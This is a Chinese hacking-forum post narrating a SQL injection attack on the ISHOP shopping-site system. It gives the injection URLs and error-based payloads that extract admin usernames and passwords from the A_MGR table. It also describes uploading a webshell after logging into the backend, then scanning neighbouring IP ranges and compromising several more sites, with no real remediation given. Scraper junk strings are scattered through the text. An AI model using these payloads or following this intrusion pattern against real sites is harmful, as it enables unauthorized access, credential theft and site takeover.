中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点
( j1 L) s: d, m2 X, Nhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
/ z( X9 e; n: I' T3 h+ n- D8 }+ P( b
; P/ [7 k( L- K9 P7 {习惯性的加’having1=1--
( o6 q3 |/ x0 u# W1 ^8 u3 m4 n& D3 f
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
: C, l! j3 @7 ?& |* O$ Y& w: ?+ L
% M; {9 C' F1 y. _7 _3 K1 [9 g. r0
  J2 \5 }! M3 i& @# i! ]
" U* q7 d" _) M! J) |4 t' p' g6 \爆出Diary_A.dl_Title(这时候很激动啊)
4 ^2 e% V( D6 A1 @1 j% M$ P" t' f# n* l
那么继续
0 {; J) @+ {" N5 b) {  {. B/ @5 O" whttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
6 o, I& `( k* J+ F% J! J7 E5 D5 ~. f5 {" S
继续,一直爆下去
% V/ X: z( ^5 M) X6 F, V+ m4 ~8 N2 E/ X* F' `5 i6 m
爆到几个字段和表段 但是没找到需要的管理用户的字段
  M2 }) ?$ j; K' @2 {9 C& w2 U
0 s3 V9 ]6 ^+ O  C- ?) N. ~* q蛋疼了 怎么办 然后去后台登陆页看源码' p* K8 t7 o4 \5 B- I/ S7 Q

: ~' N' `0 O6 h3 o4 T( [$ z! r02 I" ]) b  O; t% a8 b% q$ J
1 g4 W: g5 H2 g2 m
Input name= “ADUID”( O5 b, A. m2 |! ?9 A# S
Input name= “ADPWD”
- R' C$ I  v( l  q* `4 K: \
9 j7 R: y: G* C( i很幸运 找到了字段那就继续. w7 ^  b7 H9 a. T4 O+ D
找到之后开始爆用户
. E2 l) J0 r7 R  }# qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
' w+ S* ]4 ?3 q: A6 r; ]  d; F爆密码
7 A! Q$ U' r5 }( vhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—# [% K. _& K% Q  q
测试了下 这个注入点只能爆到文章哪里的表 + j1 r; o. g, h3 C2 R8 T$ A  a

# g! i' m3 m7 q  n头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了+ n0 ]1 k* |3 E" }

" p, g3 C  b8 @) m又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
$ ~( U1 N/ E/ i+ Q+ ~5 D8 ]
0 w5 i! ?9 V2 G* h473
0 d3 g% k3 V& T7 `& ]
, W4 i, [# M7 F+ j# ~1 C, g进后台
! h5 K8 [! R% W2 |) A1 E
5 w6 s. u: e# [, t& i+ S  o# e
5 @! g: i& _7 X1 |  x; Z# Y( [发现几个上传点 有的地方不能上传 而且防止恶意代码
6 B: j# c1 e6 v$ o9 z
! w4 Q: P( ]* S7 P没办法 各种百度各种找大牛 找到一只好像可以突破的马
5 F/ p! z0 V8 Q  S' a4 x4 c1 v( @/ o9 q' `1 v
- J9 x. c% f/ X7 b9 V6 W# t
在系统管理那里直接上传 不过没有显示地址
0 s- t! K* ^' ~2 A: P6 V* m  E- P# K' _* @7 `
再上传一次 抓包 搞定OK
. V& |. r7 N$ I4 V, s! @% q/ @# t% Y$ H

. x/ k0 _& ~4 G- s6 F
( B0 i% B! o2 W( m$ l3 p# [472' Y% @6 ?. t. B
3 Q7 r8 M4 o4 k% ?- h; V1 t9 i
晚上不行了 去睡觉。。。( E" X% G7 d" |4 p7 G
第二天刚起床 闲的没事做继续日站吧 ( q7 b  _1 e( G' l; u$ |  n8 q

7 ?; y8 K! a- X) E$ M, y+ z找个站 就把这个站的旁c扫了下& d, L% A* N8 ?$ d6 h
- U/ u+ U/ g" o! y" P, j, W* M
发现c段也有一个购物站 ,然后还和这个站的模板差不多
4 u9 d; f- |" F# \9 d6 M+ O0 n* |+ d6 d4 ?# C* u% q4 \' B
就找到会员登录口测试
/ q# J; ]' u, _; ?/ V6 `. o5 V: Z' q- j5 p# p/ B8 U# p0 b
'and (select top 1 MGR_UID from A_MGR)>0—
$ P. M# [; `. O- I0 Z果断爆到了 这时候我很激动 通杀
" o! Z6 i# p0 F8 ~, m' C" @; P6 b. n$ A2 [9 A( m& W
再次翻c段/ A2 K& m/ Z6 j/ x

4 K1 q4 ~) B$ ?* k6 \# g& V9 P' O翻出几个站 都成功拿下
* K$ h3 Y; N' z8 u
/ ]! D" Q; v& r7 M- _+ k$ ]/ B6 d
4 p5 n8 J2 b0 l0 ~$ G1 I! T( V, a  K7 x1 W6 j! S  [; m
修复方案:# m, \: d) Y2 l( |* o  |! T
他们比我专业
& G: R' R: U3 T. p1 s/ j) s* p5 k
  `8 |/ l- G3 n) a: C1 I( ]
+ e( k  x) n. g" N5 D




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2